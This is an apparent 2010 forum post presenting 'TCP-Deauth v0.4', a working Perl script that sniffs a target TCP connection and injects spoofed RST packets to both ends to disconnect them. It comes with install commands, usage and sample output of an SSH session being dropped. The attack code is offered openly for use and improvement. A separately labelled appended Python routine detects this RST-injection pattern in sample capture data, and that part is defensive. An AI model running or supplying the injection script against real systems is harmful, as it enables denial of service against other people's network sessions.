Thread: TCP-Deauth v0.4


    TCP-Deauth v0.4

    Hi. I wrote this small Perl script during my research on the TCP/IP protocol. It disconnects a host from a server; everything is in the usage.

    Code:
    #!/usr/bin/perl
    # TCP-Deauth v0.4: waits for one captured segment of the specified
    # connection and injects a spoofed RST in each direction.
    use strict;
    use warnings;
    use Net::RawIP;

    print "[TCP-Deauth v0.4] Exploit by azert0x\n" . "=" x 36 . "\n";
    my ($eth, $cip, $sip, $sport) = @ARGV;
    die "Usage: $0 [interface] [client ip] [server ip] [server port]\n" if @ARGV < 4;

    my $n = Net::RawIP->new;
    print "Waiting for specified network traffic...\n";

    # Capture only traffic matching the given hosts and server port
    # (snaplen 1500 bytes, 30 ms read timeout).
    my $p = $n->pcapinit($eth, "tcp and src host $sip and dst host $cip and dst port $sport", 1500, 30);
    # Process a single matching packet with tcprst(), then finish.
    loop($p, 1, \&tcprst, 0);
    print "> TCP-Deauth Exploit Done :)\n";

    sub tcprst {
      # $_[2] is the raw frame; skip the 14-byte Ethernet header and parse IP/TCP.
      $n->bset(substr $_[2], 14);
      my ($cport, $ack_seq, $seq) = $n->get({tcp => [qw(source ack_seq seq)]});
      # RST towards the server, masquerading as the client.
      $n->set({ip => {saddr => $cip, daddr => $sip}, tcp => {source => $cport, dest => $sport, ack_seq => $ack_seq, seq => $seq, rst => 1}});
      print "Sending Spoofed RST to $sip:$sport with Acknum $ack_seq and Seqnum $seq\n";
      $n->send;
      # RST towards the client, masquerading as the server.
      $n->set({ip => {saddr => $sip, daddr => $cip}, tcp => {source => $sport, dest => $cport, ack_seq => $ack_seq, seq => $seq, rst => 1}});
      print "Sending Spoofed RST to $cip:$cport with Acknum $ack_seq and Seqnum $seq\n";
      $n->send;
    }

    # azert0x first sploit.
    # Thanks to Perl Underground!
    ----------------------------------

    On BackTrack4 the CPAN Perl module Net::RawIP segfaults, so:

    $ sudo perl -MCPAN -e "install Net::RawIP"


    and after compilation and (re)installation it works great. Then run the script as is and you'll see the usage.

    $ sudo perl deauth.pl

    My script spies on the specified client and server network traffic, gets the values of the ack_seq & seq fields and sends the server a network packet carrying them with the RST flag set (this RST packet masquerades as the client). If the connection is in the ESTABLISHED state, my script re-sends another RST packet to the client (this RST packet masquerades as the server).

    You must obviously be able to sniff the traffic between the targets for my tool to work (you should have understood that from reading the above).

    It works in various network environments, not only on localhost!
    But if you work on localhost (127.0.0.1), specify "lo" as the network interface.

    For example: I have a localhost SSH server and I'm connected to it. I run my Perl script and it waits for network traffic. When I press a key in my SSH shell, I'm disconnected.

    azert0x@bt4:~$ sudo perl deauth.pl lo 127.0.0.1 127.0.0.1 22
    [TCP-Deauth v0.4] Exploit by azert0x
    ============================
    Waiting for specified network traffic...
    Sending Spoofed RST to 127.0.0.1:22 with Acknum -131693645 and Seqnum -123819417...
    Sending Spoofed RST to 127.0.0.1:60295 with Acknum -131693645 and Seqnum -123819417...
    > TCP-Deauth Exploit Done :)

    I'll update it soon, so please, if you have any problems, bugs or ideas about it, tell me. Then I'll gladly work on improvements.
    Last edited by azert0x; 10-15-2010 at 02:29 PM.
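A defender-side complement to the post above, added here and not the author's code: detection logic that flags the RST pattern this tool leaves in a capture, namely a RST whose seq field repeats the peer's own sequence number, and two opposite-direction RSTs sharing identical seq/ack values. The packet records are constructed sample data; the record layout, function name and alert labels are my own assumptions.

```python
# Detect the RST-injection signature described in the post above.
# Records are constructed sample data in the shape a tcpdump-style parser
# would yield: (timestamp, src, sport, dst, dport, flags, seq, ack).

# Constructed capture: a genuine server->client segment, two injected RSTs
# (one per direction, both reusing that segment's seq/ack), then a genuine
# client RST on another connection whose seq is the client's own next seq.
SAMPLE_PACKETS = [
    (10.000, "10.0.0.5", 22, "10.0.0.9", 60295, "PA", 1000, 5000),
    (10.001, "10.0.0.9", 60295, "10.0.0.5", 22, "R", 1000, 5000),
    (10.001, "10.0.0.5", 22, "10.0.0.9", 60295, "R", 1000, 5000),
    (20.000, "10.0.0.5", 22, "10.0.0.7", 41000, "PA", 7000, 9000),
    (20.500, "10.0.0.7", 41000, "10.0.0.5", 22, "R", 9000, 7040),
]


def detect_rst_injection(packets, pair_window=0.05):
    """Return (timestamp, reason, direction) alerts for suspicious RSTs.

    direction is the 4-tuple (src, sport, dst, dport) of the flagged RST.
    """
    last_seen = {}   # direction -> (ts, seq, ack) of the last packet seen
    recent_rst = {}  # direction -> (ts, seq, ack) of the last RST seen
    alerts = []
    # Stable sort by timestamp so same-timestamp packets keep capture order.
    for ts, src, sport, dst, dport, flags, seq, ack in sorted(packets, key=lambda p: p[0]):
        fwd = (src, sport, dst, dport)
        rev = (dst, dport, src, sport)
        if "R" in flags:
            peer = last_seen.get(rev)
            # A host's own RST carries its own sequence number; a RST whose
            # seq equals the peer's last seq was copied from the peer's packet.
            if peer is not None and peer[1] == seq:
                alerts.append((ts, "rst_mirrors_peer_seq", fwd))
            # Legitimate opposite directions swap seq and ack, so two RSTs in
            # opposite directions with identical seq AND ack cannot both be real.
            prev = recent_rst.get(rev)
            if prev is not None and prev[1:] == (seq, ack) and ts - prev[0] <= pair_window:
                alerts.append((ts, "paired_rst_identical_seq_ack", fwd))
            recent_rst[fwd] = (ts, seq, ack)
        last_seen[fwd] = (ts, seq, ack)
    return alerts


if __name__ == "__main__":
    for alert in detect_rst_injection(SAMPLE_PACKETS):
        print(alert)
```

On the sample, the two injected RSTs raise alerts while the genuine RST on the second connection does not.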
